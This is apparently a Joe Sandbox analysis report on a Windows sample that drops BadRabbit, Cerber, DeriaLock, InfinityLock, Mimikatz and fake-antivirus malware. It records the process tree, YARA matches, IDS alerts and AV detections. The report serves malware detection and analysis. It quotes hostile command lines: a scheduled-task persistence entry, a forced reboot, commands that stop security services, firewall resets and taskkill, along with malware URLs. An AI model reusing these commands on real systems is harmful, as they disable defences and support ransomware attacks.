Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bpkAAJptGv.exe

Overview

General Information

Sample Name:bpkAAJptGv.exe
Analysis ID:712613
MD5:d197fad90535fb974db139537a091a5b
SHA1:5529175952d3fa0697124260e46ec1dbd0c63ae7
SHA256:a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6
Tags:exeRansomware
Infos:

Detection

Babuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected DeriaLock Ransomware
Yara detected Babuk Ransomware
System process connects to network (likely due to code injection or exploit)
Sigma detected: Execute DLL with spoofed extension
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Cerber ransomware
Antivirus / Scanner detection for submitted sample
Yara detected Mimikatz
Multi AV Scanner detection for dropped file
Yara detected InfinityLock Ransomware
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Found Tor onion address
Deletes keys related to Windows Defender
PE file has a writeable .text section
Deletes keys which are related to windows safe boot (disables safe mode boot)
Machine Learning detection for sample
Writes many files with high entropy
Connects to many different private IPs (likely to spread or exploit)
Disables security and backup related services
Tries to detect virtualization through RDTSC time measurements
Disables the windows security center
Disables the Windows registry editor (regedit)
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to create processes via WMI
Opens network shares
Disables Windows system restore
Contains functionality to enumerate network shares of other devices
Changes security center settings (notifications, updates, antivirus, firewall)
Disables the Windows task manager (taskmgr)
PE file has nameless sections
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Modifies the windows firewall
Connects to many different private IPs via SMB (likely to spread or exploit)
Found evasive API chain (may stop execution after checking computer name)
Found decision node followed by non-executed suspicious APIs
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Checks for available system drives (often done to infect USB drives)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Changes the start page of internet explorer
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Deletes files inside the Windows folder
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Changes the window title of internet explorer
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Uses net.exe to stop services
PE file contains an invalid checksum
File is packed with WinRar
Detected TCP or UDP traffic on non-standard ports
Potential key logger detected (key state polling based)
Uses taskkill to terminate processes
Found evaded block containing many API calls
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information

Classification

  • System is w10x64
  • bpkAAJptGv.exe (PID: 5512 cmdline: "C:\Users\user\Desktop\bpkAAJptGv.exe" MD5: D197FAD90535FB974DB139537A091A5B)
    • bpkAAJptGv.exe (PID: 1324 cmdline: "C:\Users\user\Desktop\bpkAAJptGv.exe" MD5: D197FAD90535FB974DB139537A091A5B)
    • Endermanch@Antivirus.exe (PID: 1332 cmdline: "C:\Users\user\Desktop\Endermanch@Antivirus.exe" MD5: C7E9746B1B039B8BD1106BCA3038C38F)
      • net.exe (PID: 3796 cmdline: net stop wscsvc MD5: DD0561156F62BC1958CE0E370B23711B)
        • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net.exe (PID: 7012 cmdline: net stop winmgmt /y MD5: DD0561156F62BC1958CE0E370B23711B)
        • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net.exe (PID: 7032 cmdline: net start winmgmt MD5: DD0561156F62BC1958CE0E370B23711B)
        • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net.exe (PID: 7456 cmdline: net start wscsvc MD5: DD0561156F62BC1958CE0E370B23711B)
    • Endermanch@AntivirusPlatinum.exe (PID: 272 cmdline: "C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe" MD5: 382430DD7EAE8945921B7FEAB37ED36B)
      • 302746537.exe (PID: 3820 cmdline: "C:\WINDOWS\302746537.exe" MD5: 8703FF2E53C6FD3BC91294EF9204BACA)
        • cmd.exe (PID: 5308 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\341C.tmp\302746537.bat" " MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • regsvr32.exe (PID: 5136 cmdline: regsvr32 /s c:\windows\comctl32.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
          • regsvr32.exe (PID: 1104 cmdline: regsvr32 /s c:\windows\mscomctl.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
          • antivirus-platinum.exe (PID: 792 cmdline: c:\windows\antivirus-platinum.exe MD5: CD1800322CCFC425014A8394B01A4B3D)
          • attrib.exe (PID: 7020 cmdline: attrib +h c:\windows\antivirus-platinum.exe MD5: A5540E9F87D4CB083BDF8269DEC1CFF9)
    • Endermanch@AnViPC2009.exe (PID: 2296 cmdline: "C:\Users\user\Desktop\Endermanch@AnViPC2009.exe" MD5: 910DD666C83EFD3496F21F9F211CDC1F)
      • avpc2009.exe (PID: 1588 cmdline: "C:\Program Files (x86)\antiviruspc2009\avpc2009.exe" MD5: C18A7323332B3292A8E0F1C81DF65698)
    • Endermanch@BadRabbit.exe (PID: 5224 cmdline: "C:\Users\user\Desktop\Endermanch@BadRabbit.exe" MD5: FBBDC39AF1139AEBBA4DA004475E8839)
      • conhost.exe (PID: 2968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • rundll32.exe (PID: 4900 cmdline: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • cmd.exe (PID: 4944 cmdline: /c schtasks /Delete /F /TN rhaegal MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 3344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 1804 cmdline: schtasks /Delete /F /TN rhaegal MD5: 15FF7D8324231381BAD48A052F85DF04)
        • cmd.exe (PID: 5620 cmdline: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1382722661 && exit" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 2020 cmdline: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1382722661 && exit" MD5: 15FF7D8324231381BAD48A052F85DF04)
        • cmd.exe (PID: 2040 cmdline: /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:04:00 MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 1964 cmdline: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:04:00 MD5: 15FF7D8324231381BAD48A052F85DF04)
        • 870F.tmp (PID: 1852 cmdline: "C:\Windows\870F.tmp" \\.\pipe\{60F226A4-8E49-484F-BBA1-D3ECC97C63B9} MD5: 347AC3B6B791054DE3E5720A7144A977)
          • conhost.exe (PID: 2524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Endermanch@Birele.exe (PID: 4156 cmdline: "C:\Users\user\Desktop\Endermanch@Birele.exe" MD5: 41789C704A0EECFDD0048B4B4193E752)
      • taskkill.exe (PID: 2368 cmdline: taskkill /F /IM explorer.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
        • conhost.exe (PID: 60 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Endermanch@Cerber5.exe (PID: 480 cmdline: "C:\Users\user\Desktop\Endermanch@Cerber5.exe" MD5: FE1BC60A95B2C2D77CD5D232296A7FA4)
      • netsh.exe (PID: 3364 cmdline: C:\Windows\system32\netsh.exe advfirewall set allprofiles state on MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 1844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 3176 cmdline: C:\Windows\system32\netsh.exe advfirewall reset MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 5028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Endermanch@DeriaLock.exe (PID: 4008 cmdline: "C:\Users\user\Desktop\Endermanch@DeriaLock.exe" MD5: 0A7B70EFBA0AA93D4BC0857B87AC2FCB)
    • Endermanch@FakeAdwCleaner.exe (PID: 5644 cmdline: "C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe" MD5: 248AADD395FFA7FFB1670392A9398454)
      • 6AdwCleaner.exe (PID: 6148 cmdline: "C:\Users\user\AppData\Local\6AdwCleaner.exe" MD5: 87E4959FEFEC297EBBF42DE79B5C88F6)
    • Endermanch@InfinityCrypt.exe (PID: 7424 cmdline: "C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe" MD5: B805DB8F6A84475EF76B795B0D1ED6AE)
  • svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4456 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6048 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6116 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6084 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5232 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5204 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5372 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 5696 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5408 cmdline: c:\windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cmd.exe (PID: 4368 cmdline: C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 1382722661 && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 3216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeJoeSecurity_infinitylockYara detected InfinityLock RansomwareJoe Security
    C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeMALWARE_Win_InfinityLockDetects InfinityLock ransomwareditekSHen
    • 0x2c145:$s3: GenerateHWID
    • 0x2c2c3:$s4: CreateKey
    • 0x2c1b6:$d1: ProgrammFiles
    • 0x2c1ad:$d2: OneDrive
    • 0x2c184:$d3: ProgrammsX86
    • 0x2c1a4:$d4: UserDirs
    • 0x2c1dd:$d5: B_Drive
    • 0x2e834:$pdb1: F:\DESKTOP!\ChkDsk\ChkDsk\obj\
    • 0x2e846:$pdb2: \ChkDsk\obj\Debug\PremiereCrack.pdb
    C:\Users\user\Desktop\Endermanch@Cerber5.execerber3Cerber3 pekeinfo
    • 0x48e9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
    C:\Windows\dispci.exeBadRabbit_GenDetects BadRabbit RansomwareFlorian Roth
    • 0x148a0:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST
    • 0x14430:$x4: C:\Windows\cscc.dat
    • 0x1b1bd:$s1: need to do is submit the payment and get the decryption password.
    • 0x1f30d:$s1: need to do is submit the payment and get the decryption password.
    • 0x14500:$s2: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
    • 0x1b53f:$s5: Run DECRYPT app at your desktop after system boot
    • 0x1f68f:$s5: Run DECRYPT app at your desktop after system boot
    • 0x146ca:$s6: Files decryption completed
    • 0x145ea:$s7: Disable your anti-virus and anti-malware programs
    C:\Windows\dispci.exesig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93Bad Rabbit RansomwareChristiaan Beek
    • 0x148a0:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
    • 0x1b1bd:$x2: need to do is submit the payment and get the decryption password.
    • 0x1f30d:$x2: need to do is submit the payment and get the decryption password.
    • 0x1b40a:$s3: If you have already got the password, please enter it below.
    • 0x1f55a:$s3: If you have already got the password, please enter it below.
    • 0x2130c:$s4: dispci.exe
    • 0x14500:$s5: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
    • 0x1b53f:$s6: Run DECRYPT app at your desktop after system boot
    • 0x1f68f:$s6: Run DECRYPT app at your desktop after system boot
    • 0x147b8:$s7: Enter password#1:
    • 0x14676:$s8: Enter password#2:
    • 0x14430:$s9: C:\Windows\cscc.dat
    • 0x14940:$s10: schtasks /Delete /F /TN %ws
    • 0x1b448:$s11: Password#1:
    • 0x1f598:$s11: Password#1:
    • 0x14398:$s12: \AppData
    • 0x14650:$s13: Readme.txt
    • 0x14752:$s14: Disk decryption completed
    • 0x146ca:$s15: Files decryption completed
    • 0x212b4:$s16: http://diskcryptor.net/
    • 0x1b235:$s17: Your personal installation key#1:
    Click to see the 11 entries
    SourceRuleDescriptionAuthorStrings
    00000038.00000000.470198908.0000000000662000.00000002.00000001.01000000.00000023.sdmpJoeSecurity_infinitylockYara detected InfinityLock RansomwareJoe Security
      0000002C.00000002.483707554.00007FF745E0E000.00000004.00000001.01000000.0000001E.sdmpmimikatzmimikatzBenjamin DELPY (gentilkiwi)
      • 0x10a8:$exe_x64_1: 33 FF 41 89 37 4C 8B F3 45 85 C0 74
      • 0x10b8:$exe_x64_1: 33 FF 45 89 37 48 8B F3 45 85 C9 74
      • 0x1068:$exe_x64_2: 4C 8B DF 49 C1 E3 04 48 8B CB 4C 03 D8
      00000038.00000000.470518436.0000000000673000.00000002.00000001.01000000.00000023.sdmpJoeSecurity_infinitylockYara detected InfinityLock RansomwareJoe Security
        00000017.00000000.422069094.0000000000448000.00000020.00000001.01000000.00000014.sdmpcerber3Cerber3 pekeinfo
        • 0x1a9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
        0000001B.00000000.424660470.0000000000A66000.00000002.00000001.01000000.00000016.sdmpJoeSecurity_DeriaLockYara detected DeriaLock RansomwareJoe Security
          Click to see the 12 entries
          SourceRuleDescriptionAuthorStrings
          16.0.Endermanch@BadRabbit.exe.1100000.2.unpackBadRabbit_GenDetects BadRabbit RansomwareFlorian Roth
          • 0x6114:$x3: C:\Windows\infpub.dat
          • 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
          16.2.Endermanch@BadRabbit.exe.1100000.0.unpackBadRabbit_GenDetects BadRabbit RansomwareFlorian Roth
          • 0x6114:$x3: C:\Windows\infpub.dat
          • 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
          20.2.rundll32.exe.1242f28.1.unpackINDICATOR_TOOL_ENC_DiskCryptorDetect DiskCryptor open encryption solution that offers encryption of all disk partitionsditekSHen
          • 0x2a1d8:$d1: \DosDevices\dcrypt
          • 0x2a288:$d2: $dcsys$_fail_%x
          • 0x2a268:$d3: %s\$DC_TRIM_%x$
          • 0x2a1b8:$d4: \Device\dcrypt
          • 0x2a220:$d5: %s\$dcsys$
          16.2.Endermanch@BadRabbit.exe.117f448.1.unpackBadRabbit_GenDetects BadRabbit RansomwareFlorian Roth
          • 0x5514:$x3: C:\Windows\infpub.dat
          • 0x5558:$s10: %ws C:\Windows\%ws,#1 %ws
          44.2.870F.tmp.7ff745e00000.0.unpackBadRabbit_Mimikatz_CompAuto-generated ruleFlorian Roth
          • 0xa848:$s1: %lS%lS%lS:%lS
          • 0xa440:$s2: lsasrv
          • 0xa868:$s3: CredentialKeys
          • 0xa878:$s4: 50 72 69 6D 61 72 79 00 6D 00 73 00 76 00
          Click to see the 40 entries

          Data Obfuscation

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Users\user\Desktop\Endermanch@BadRabbit.exe" , ParentImage: C:\Users\user\Desktop\Endermanch@BadRabbit.exe, ParentProcessId: 5224, ParentProcessName: Endermanch@BadRabbit.exe, ProcessCommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, ProcessId: 4900, ProcessName: rundll32.exe
          Timestamp:192.168.2.693.107.12.06323068932023614 09/29/22-14:46:14.805892
          SID:2023614
          Source Port:63230
          Destination Port:6893
          Protocol:UDP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.6185.53.177.5349811802809804 09/29/22-14:46:27.973801
          SID:2809804
          Source Port:49811
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://searchdusty.com/avt/avt.datAvira URL Cloud: Label: malware
          Source: http://searchdusty.com/avt/avt_dbAvira URL Cloud: Label: malware
          Source: http://searchdusty.com/avt/avtr.datAvira URL Cloud: Label: malware
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeAvira: detection malicious, Label: HEUR/AGEN.1224490
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeAvira: detection malicious, Label: HEUR/AGEN.1227089
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeAvira: detection malicious, Label: TR/AD.FakeRean.mwfxa
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeAvira: detection malicious, Label: DR/Pasta.kdx
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeAvira: detection malicious, Label: TR/Fake.avpc.94312
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeAvira: detection malicious, Label: TR/Dldr.FraudLoad.xerf
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeAvira: detection malicious, Label: JOKE/Agent.rlham
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeAvira: detection malicious, Label: DR/Agent.aq.122610
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeAvira: detection malicious, Label: TR/BAS.Samca.fyzpg
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeAvira: detection malicious, Label: TR/Genasom.wzara
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeAvira: detection malicious, Label: PUA/HappyAV.A
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeAvira: detection malicious, Label: TR/Diskcoder.ezxim
          Source: bpkAAJptGv.exeReversingLabs: Detection: 53%
          Source: bpkAAJptGv.exeMetadefender: Detection: 21%Perma Link
          Source: bpkAAJptGv.exeAvira: detected
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeReversingLabs: Detection: 62%
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeMetadefender: Detection: 56%Perma Link
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeReversingLabs: Detection: 60%
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeMetadefender: Detection: 52%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeReversingLabs: Detection: 67%
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeMetadefender: Detection: 24%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeReversingLabs: Detection: 85%
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeMetadefender: Detection: 60%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeReversingLabs: Detection: 77%
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeMetadefender: Detection: 28%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeReversingLabs: Detection: 92%
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeMetadefender: Detection: 64%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeReversingLabs: Detection: 92%
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeMetadefender: Detection: 82%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeReversingLabs: Detection: 86%
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeMetadefender: Detection: 77%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeReversingLabs: Detection: 90%
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeMetadefender: Detection: 75%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeReversingLabs: Detection: 92%
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeMetadefender: Detection: 68%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeReversingLabs: Detection: 70%
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeMetadefender: Detection: 60%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeReversingLabs: Detection: 36%
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeMetadefender: Detection: 36%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeReversingLabs: Detection: 85%
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeMetadefender: Detection: 60%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeReversingLabs: Detection: 85%
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeMetadefender: Detection: 64%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@Krotten.exeReversingLabs: Detection: 96%
          Source: C:\Users\user\Desktop\Endermanch@Krotten.exeMetadefender: Detection: 86%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@LPS2019.exeReversingLabs: Detection: 58%
          Source: C:\Users\user\Desktop\Endermanch@LPS2019.exeMetadefender: Detection: 24%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@Movie.mpeg.exeReversingLabs: Detection: 95%
          Source: C:\Users\user\Desktop\Endermanch@Movie.mpeg.exeMetadefender: Detection: 80%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@NavaShield.exeReversingLabs: Detection: 51%
          Source: C:\Users\user\Desktop\Endermanch@NavaShield.exeMetadefender: Detection: 20%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@NoMoreRansom.exeReversingLabs: Detection: 90%
          Source: C:\Users\user\Desktop\Endermanch@NoMoreRansom.exeMetadefender: Detection: 72%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@PCDefender.exeReversingLabs: Detection: 70%
          Source: C:\Users\user\Desktop\Endermanch@PCDefender.exeMetadefender: Detection: 28%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@Petya.A.exeReversingLabs: Detection: 100%
          Source: C:\Users\user\Desktop\Endermanch@Petya.A.exeMetadefender: Detection: 84%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@PolyRansom.exeReversingLabs: Detection: 95%
          Source: C:\Users\user\Desktop\Endermanch@PolyRansom.exeMetadefender: Detection: 81%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@RegistrySmart.exeReversingLabs: Detection: 35%
          Source: C:\Users\user\Desktop\Endermanch@RegistrySmart.exeMetadefender: Detection: 20%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@SE2011.exeReversingLabs: Detection: 93%
          Source: C:\Users\user\Desktop\Endermanch@SE2011.exeMetadefender: Detection: 64%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@SecurityCentral.exeReversingLabs: Detection: 87%
          Source: C:\Users\user\Desktop\Endermanch@SecurityCentral.exeMetadefender: Detection: 80%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@SecurityDefender.exeReversingLabs: Detection: 81%
          Source: C:\Users\user\Desktop\Endermanch@SecurityDefender.exeMetadefender: Detection: 56%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@SecurityDefener2015.exeReversingLabs: Detection: 63%
          Source: C:\Users\user\Desktop\Endermanch@SecurityDefener2015.exeMetadefender: Detection: 56%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@SecurityScanner.exeReversingLabs: Detection: 81%
          Source: C:\Users\user\Desktop\Endermanch@SecurityScanner.exeMetadefender: Detection: 72%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@SmartDefragmenter.exeReversingLabs: Detection: 86%
          Source: C:\Users\user\Desktop\Endermanch@SmartDefragmenter.exeMetadefender: Detection: 72%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@VAV2008.exeReversingLabs: Detection: 63%
          Source: C:\Users\user\Desktop\Endermanch@VAV2008.exeMetadefender: Detection: 20%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@ViraLock.exeReversingLabs: Detection: 95%
          Source: C:\Users\user\Desktop\Endermanch@ViraLock.exeMetadefender: Detection: 82%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exeReversingLabs: Detection: 95%
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exeMetadefender: Detection: 88%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@WinlockerVB6Blacksod.exeReversingLabs: Detection: 45%
          Source: C:\Users\user\Desktop\Endermanch@WinlockerVB6Blacksod.exeMetadefender: Detection: 31%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@Xyeta.exeReversingLabs: Detection: 92%
          Source: C:\Users\user\Desktop\Endermanch@Xyeta.exeMetadefender: Detection: 62%Perma Link
          Source: C:\Users\user\Desktop\Fantom.exeReversingLabs: Detection: 87%
          Source: C:\Users\user\Desktop\Fantom.exeMetadefender: Detection: 65%Perma Link
          Source: C:\Windows\302746537.exeReversingLabs: Detection: 42%
          Source: C:\Windows\302746537.exeMetadefender: Detection: 52%Perma Link
          Source: C:\Windows\antivirus-platinum.exeReversingLabs: Detection: 71%
          Source: C:\Windows\antivirus-platinum.exeMetadefender: Detection: 60%Perma Link
          Source: C:\Windows\dispci.exeReversingLabs: Detection: 96%
          Source: C:\Windows\dispci.exeMetadefender: Detection: 85%Perma Link
          Source: bpkAAJptGv.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeJoe Sandbox ML: detected
